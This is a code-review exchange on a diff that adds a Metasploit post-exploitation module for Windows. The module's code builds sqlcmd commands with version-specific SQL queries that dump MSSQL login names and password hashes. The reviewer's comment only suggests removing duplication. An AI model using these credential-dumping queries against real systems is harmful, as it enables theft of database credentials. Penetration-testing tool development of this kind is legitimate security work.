modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+      else
+        # User defined instance
+      print_status(" o  OTHER Service instance: #{service_instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"SET nocount on;#{mssql_version_query}\" -h-1"
+      end
+    else
+      # User defined instance
+      print_status(" o defined instance: #{service_instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{instance} -Q \"SET nocount on;#{mssql_version_query}\" -h-1"
+    end
+
+    # Display debugging information
+    print_status("Running command:") if verbose == "true"
+    print_status("#{sqlcommand}") if verbose == "true"
+
+    # Get Data
+    get_version_result = run_cmd("#{sqlcommand}")
+
+    # Parse Data
+    get_version_array = get_version_result.split("\n")
+    version_year = get_version_array[0].strip.slice(/\d\d\d\d/)
+    if version_year
+      print_status("MSSQL version found: #{version_year}")
+      return version_year
+    else
+      print_error("MSSQL version not found")
+    end
+  end
+
+  ## ----------------------------------------------
+  ## Method for getting password hashes
+  ## ----------------------------------------------
+  def get_sql_hash(sqlclient,instance,service_instance,verbose)
+
+    version_year = get_sql_version(sqlclient,instance,service_instance,verbose)
+
+    case version_year
+    when "2000"
+      hashtype = "mssql"
+      mssql_password_hashes_query = "SELECT name+':'+master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins"
+    when "2005", "2008"
+      hashtype = "mssql05"
+      mssql_password_hashes_query = "SELECT name+':'+master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins"
+    when "2012", "2014"
+      hashtype = "mssql12"
+      mssql_password_hashes_query = "SELECT name+':'+master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins"
+    end
+
+    print_status("Attempting to get password hashes...")
+
+    # Setup command format to accomidate version inconsistencies
+    if instance == ""
+      # Check default instance name
+      if service_instance == "MSSQLSERVER" then
+        print_status(" o MSSQL Service instance: #{service_instance}") if verbose == "true"
+        sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']} -Q \"SET nocount on;#{mssql_password_hashes_query}\" -h-1 -w 200"
+      else
+      # User defined instance
+      print_status(" o  OTHER Service instance: #{service_instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"SET nocount on;#{mssql_password_hashes_query}\" -h-1 -w 200"
+      end
+    else
+      # User defined instance
+      print_status(" o defined instance: #{instance}") if verbose == "true"
+      sqlcommand = "#{sqlclient} -E -S #{sysinfo['Computer']}\\#{service_instance} -Q \"SET nocount on;#{mssql_password_hashes_query}\" -h-1 -w 200"
+    end
+
```

Comment:
Quite a bit of duplication here. Perhaps:
``` ruby
instance_name = "#{sysinfo['Computer']}\\#{service_instance}"
if instance.empty? && service_instance == 'MSSQLSERVER'
  instance_name = sysinfo['Computer']
end

vprint_status("Instance: #{instance_name}")
sqlcommand = "#{sqlclient} -E -S #{instance_name} -Q \"SET nocount on;#{mssql_password_hashes_query}\" -h-1 -w 200"
```
Also, the use of a custom `verbose` variable isn't needed. Just use the `vprint_status` function.